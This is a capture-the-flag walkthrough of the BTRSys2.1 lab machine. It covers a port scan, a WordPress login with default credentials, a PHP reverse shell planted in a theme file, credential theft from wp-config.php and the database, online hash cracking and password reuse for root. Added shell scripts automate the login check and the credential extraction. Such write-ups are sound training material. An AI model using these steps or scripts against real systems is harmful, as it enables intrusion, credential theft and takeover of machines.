BTRSys2.1
nmap
(base) [psdon@arch BTRSys2.1]$ mkdir nmap
(base) [psdon@arch BTRSys2.1]$ sudo rustscan -a 192.168.208.50 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
# Nmap 7.92 scan initiated Thu Aug 26 20:10:30 2021 as: nmap -vvv -p 21,22,80 -T4 -A -oA nmap/all-ports-service-scan 192.168.208.50
Nmap scan report for 192.168.208.50 (192.168.208.50)
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2021-08-26 20:10:30 PST for 21s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.208
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKrYYWK3Xv2EBb0KryPAargHdeVdVuGj+AHTUbH1CyLIuQ3zbtaq2+lr5K/aMqiJ5othz27+RWSJ2NmQ2JeOUBCogFLikCwU6MRDQLHpV+neS3fAKrH5fNnXo+RfnMWBLQaaXBPiUOQaoQc27hRN3SJ1hbVLEF65TY0siTrOj0Lt8SRztwkbfynHEKxMsQi5WWDLTgS7bivCf9VVWwqgmuBbsJAqFExDjLxlxJpH4+93bgEtD9EPV/KKO9B3Inaz8PxC+zXZofhZXloysYoGg4IZzT55JzrRVRuv/cbGcMuGTBpCCkdH01G4NCSgL7YwX13C1Qc+EFX1QExV6k1ePD
| 256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFTsqff4O0hsl+RUR2lXFcbCEkvFcspHALA2RR2DpoD2AlRN/DEpIbW3NETNXxxyKHTtGhUiBSUuw8S9RSBAsnY=
| 256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH91w++CdkbeAkmXYietVhD/73nEaXR/nbeBEyuwLwgq
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS

Three ports are open. Port 21 allows anonymous FTP login (worth a look if the web route stalls) and port 80 serves Apache with a robots.txt that has one disallowed entry, so let's check /robots.txt first.

WordPress
You can see that robots.txt contains an interesting directory, /wordpress. Let's see if we can log in using default credentials: try admin as both the username and the password.

Looks like we were able to log in using those credentials.
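The same default-credential check can be done from the terminal instead of the browser. The script below is an added example, not part of the original writeup: it POSTs to wp-login.php the way the login form does and treats the response as a successful login only if WordPress sets a wordpress_logged_in_* cookie. The target URL and the admin/admin guess are assumptions taken from the steps above; the two header samples at the bottom are constructed, not captured from the box.

```shell
#!/bin/sh
# Added example (not from the original writeup): non-interactive WordPress login check.
# Assumed target base URL and credential guess; only curl is required.

# has_login_cookie FILE: succeed if the saved response headers carry the
# wordpress_logged_in_* cookie, which WordPress sets only after a valid login.
# A failed login comes back 200 with the form and only the test cookie.
has_login_cookie() {
    grep -qi '^Set-Cookie: *wordpress_logged_in_' "$1"
}

# wp_login_check BASEURL USER PASS: submit the login form with curl.
# WordPress refuses the POST unless the test cookie is presented, so it is
# sent explicitly along with testcookie=1. Prints the verdict, returns 0/1.
wp_login_check() {
    base="$1"; user="$2"; pass="$3"
    hdrs="$(mktemp)"
    curl -s -o /dev/null -D "$hdrs" \
        -b 'wordpress_test_cookie=WP+Cookie+check' \
        --data-urlencode "log=$user" \
        --data-urlencode "pwd=$pass" \
        --data-urlencode 'wp-submit=Log In' \
        --data-urlencode 'testcookie=1' \
        "$base/wp-login.php"
    if has_login_cookie "$hdrs"; then
        rm -f "$hdrs"; echo "valid: $user:$pass"; return 0
    fi
    rm -f "$hdrs"; echo "invalid: $user:$pass"; return 1
}

# Constructed sample header files (hypothetical, not captured from the target)
# showing what the two outcomes look like, so has_login_cookie can be tried offline.
SAMPLE_OK="$(mktemp)"; SAMPLE_FAIL="$(mktemp)"
printf 'HTTP/1.1 302 Found\r\nSet-Cookie: wordpress_logged_in_abc=admin%%7C1; path=/wordpress/; HttpOnly\r\nLocation: http://192.168.208.50/wordpress/wp-admin/\r\n\r\n' > "$SAMPLE_OK"
printf 'HTTP/1.1 200 OK\r\nSet-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/\r\nContent-Type: text/html\r\n\r\n' > "$SAMPLE_FAIL"

# Against the live box (commented out so the script runs offline):
# wp_login_check http://192.168.208.50/wordpress admin admin
```

Checking for the logged-in cookie is more reliable than grepping the body for "Dashboard", because a plugin or theme can change the HTML but not the cookie WordPress issues on authentication.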

Initial Foothold
To get a reverse shell, set up a netcat listener first (for example nc -lvnp on the port your payload will connect back to).
Then go to the theme editor (Appearance > Editor in the admin panel) and set the payload.

Find a file you want to overwrite with your PHP reverse shell payload. In my case, I will use the 404.php file of the active theme.

Edit the file, paste your payload and save. You can use this PHP reverse shell payload, or whatever you prefer; either way, set the listener IP and port in the payload to match the netcat listener you started.

Visit /wordpress/wp-content/themes/twentyfourteen/404.php directly (requesting the file by path executes it as PHP, no 404 condition needed) and you should receive your shell in the listener terminal.


Post Exploitation
Let's check wp-config.php in the WordPress webroot.
There's a MySQL credential in the file; let's try to log in with root as the username and rootpassword! as the password.
I found credentials inside the wordpress database, in the wp_users table.
I cracked the hashed user_pass of the root user using crackingstation.net.

The password we cracked is roottoor.
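The three post-exploitation steps above (read wp-config.php, query wp_users, crack the hash) can be scripted from the shell you already have on the box. The script below is an added example and not part of the original writeup: it extracts the DB_* defines from a wp-config.php, prints the mysql one-liner that dumps wp_users, and classifies each hash so you know whether an online MD5 lookup can handle it or whether a salted phpass/bcrypt hash needs hashcat or john. The wp-config.php and the two user rows are constructed samples; only the credential names mirror the writeup.

```shell
#!/bin/sh
# Added example (not from the original writeup): WordPress post-exploitation helpers.
# Constructed sample wp-config.php; the values are hypothetical.
SAMPLE_CFG="$(mktemp)"
cat > "$SAMPLE_CFG" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
$table_prefix = 'wp_';
EOF

# wpconf_get KEY FILE: print the value of define('KEY', '...') from a wp-config.php.
wpconf_get() {
    sed -n "s/^define( *'$1', *'\([^']*\)' *);.*/\1/p" "$2" | head -n 1
}

# wp_users_dump_cmd FILE: the mysql one-liner to run on the target (or through an
# SSH tunnel) with the recovered credentials. It is printed, not executed, so this
# script stays offline; -N -B give bare tab-separated rows for the loop below.
wp_users_dump_cmd() {
    printf "mysql -N -B -h '%s' -u '%s' -p'%s' -D '%s' -e 'SELECT user_login, user_pass FROM wp_users;'\n" \
        "$(wpconf_get DB_HOST "$1")" "$(wpconf_get DB_USER "$1")" \
        "$(wpconf_get DB_PASSWORD "$1")" "$(wpconf_get DB_NAME "$1")"
}

# hash_type HASH: classify a wp_users.user_pass value. WordPress normally stores
# salted phpass ($P$) hashes; a bare 32-hex value is an unsalted MD5, which is
# why an online lookup worked in the writeup.
hash_type() {
    case "$1" in
        '$P$'*|'$H$'*)   echo "phpass (salted; hashcat -m 400 / john --format=phpass)" ;;
        '$2y$'*|'$2a$'*) echo "bcrypt (salted; hashcat -m 3200)" ;;
        *)
            if printf '%s' "$1" | grep -Eq '^[0-9a-f]{32}$'; then
                echo "raw md5 (unsalted; hashcat -m 0 or an online lookup)"
            else
                echo "unknown"
            fi ;;
    esac
}

# Constructed sample rows in the format the mysql command prints
# (the phpass string is a made-up placeholder, not a real hash).
SAMPLE_ROWS="$(printf 'admin\t$P$BvTfU2MgTt.KN2j.6ILnJqDeY6HLrL1\nroot\t5f4dcc3b5aa765d61d8327deb882cf99\n')"

echo "Dump command: $(wp_users_dump_cmd "$SAMPLE_CFG")"
printf '%s\n' "$SAMPLE_ROWS" | while IFS="$(printf '\t')" read -r login hash; do
    echo "$login: $(hash_type "$hash")"
done
```

The hash-format check is the step most worth keeping: CrackStation-style lookups only work on unsalted hashes, so if user_pass had been a normal $P$ phpass value the right move would have been hashcat -m 400 with a wordlist rather than an online lookup.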
Privilege Escalation
Let's try the cracked password against the system root account (su from the shell, or SSH on port 22), since the WordPress root user's password turns out to be reused for it.
You are now root!